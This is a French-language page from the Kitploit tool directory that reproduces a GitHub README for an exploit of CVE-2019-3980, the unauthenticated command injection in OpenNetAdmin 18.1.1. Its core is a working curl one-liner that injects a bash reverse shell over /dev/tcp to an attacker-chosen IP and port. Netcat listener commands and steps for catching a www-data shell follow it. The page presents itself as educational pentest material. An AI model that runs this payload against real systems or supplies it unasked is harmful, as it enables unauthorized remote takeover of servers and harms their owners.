Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-3980-Open_Net_Admin_v18.1.1_RCE | Kitploit
Outils/GitHubGitHub/cyberquestor-infosec/cve-2019-3980-open_net_admin_v18.1.1_rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et Éducation
GitHubcyberquestor-infosec/cve-2019-3980-open_net_admin_v18.1.1_rce

CVE-2019-3980-Open_Net_Admin_v18.1.1_RCE

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
1il y a 1 anPas encore vérifié

CVE-2019-3980 – OpenNetAdmin 18.1.1 : Exécution de code à distance

⚠️ Avertissement
Ce dépôt est destiné uniquement à des fins éducatives et de recherche.
Les informations et le code fournis ici peuvent être utilisés dans des environnements contrôlés, comme des machines de laboratoire privées.
Toute utilisation non autorisée de ce code contre des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas explicitement obtenu l'autorisation de tester est illégale et contraire à l'éthique.
L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé.


🔍 À propos de la vulnérabilité

Une vulnérabilité d'exécution de code à distance existe dans OpenNetAdmin 18.1.1 via l'interface de requêtes AJAX xajax.
La vulnérabilité provient d'un assainissement inadéquat des entrées, permettant une injection de commandes via une requête POST spécialement conçue envoyée à /ona/.
Cet exploit utilise le plugin tooltips pour déclencher un shell inverse vers l'écouteur de l'attaquant.

  • CVE ID : CVE-2019-3980
  • Exploit-DB ID : 47691
  • Application vulnérable : OpenNetAdmin 18.1.1
  • Paramètre affecté : xajaxargs[]
  • Impact : Exécution de code à distance
  • Authentification requise : ❌ Non
  • Accès réseau requis : ✅ Oui

📂 Aperçu de l'exploit

  • Type d'exploit : Injection de commandes → Shell inverse
  • Titre de l'exploit : OpenNetAdmin 18.1.1 – RCE non authentifié
  • ExploitDB ID : 47691
  • Langage : Bash (via curl)
  • Authentification requise : ❌ Non

⚙️ Code de l'exploit

Ce one-liner Bash personnalisé envoie une requête POST au point de terminaison vulnérable xajax=window_submit avec un code de shell inverse injecté.

root@kitploit:~
#!/bin/bash

curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F<YOUR-IP>%2F<YOUR-PORT>%200%3E%261%22;echo \"END\"&xajaxargs[]=ping" "http://<TARGET-IP>/ona/" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1

🛠️ Remarque :
Remplacez <YOUR-IP> et <YOUR-PORT> par l'adresse IP et le port de votre écouteur Netcat.
Démarrez votre écouteur avec :

root@kitploit:~
nc -nlvp <PORT>

🎯 Démonstration

1. Affichage de la page Web et de la version ONA

ONA Web Interface

Capture d'écran de l'interface et de la version OpenNetAdmin vulnérables.


🚀 Utilisation de l'exploit

2. Exécution de l'exploit

root@kitploit:~
bash shell.sh

Exploit Execution

Capture d'écran de l'exécution du script déclenchant la charge utile.


🐚 Shell inverse

3. Obtention du shell inverse

root@kitploit:~
nc -nlvp <PORT>

Reverse Shell

Shell inverse intercepté avec l'utilisateur www-data.


📚 Références

  • Exploit-DB : CVE-2019-3980
  • Informations CVE NVD

📝 Blog Medium

Consultez le tutoriel détaillé et la théorie dans mon article Medium :
👉 Lire le blog sur Medium

Télécharger l’outil